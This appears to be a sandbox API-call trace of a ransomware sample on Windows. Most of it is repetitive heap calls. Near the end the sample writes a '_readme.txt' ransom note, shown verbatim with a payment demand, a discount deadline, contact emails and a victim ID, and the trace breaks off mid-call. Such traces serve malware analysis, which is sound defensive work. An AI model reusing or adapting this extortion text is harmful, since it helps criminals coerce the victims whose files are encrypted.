[0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.562] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.564] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.565] PathFindFileNameW (pszPath="C:\\Boot\\fr-FR\\") returned="fr-FR\\" [0228.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.565] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.565] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.565] PathFindFileNameW (pszPath="") returned="" [0228.565] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.565] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.566] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.566] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.566] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.566] PathAppendW (in: pszPath="C:\\Boot\\fr-FR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 1 [0228.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.566] PathFileExistsW (pszPath="C:\\Boot\\fr-FR\\_readme.txt") returned 0 [0228.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.568] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.568] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt 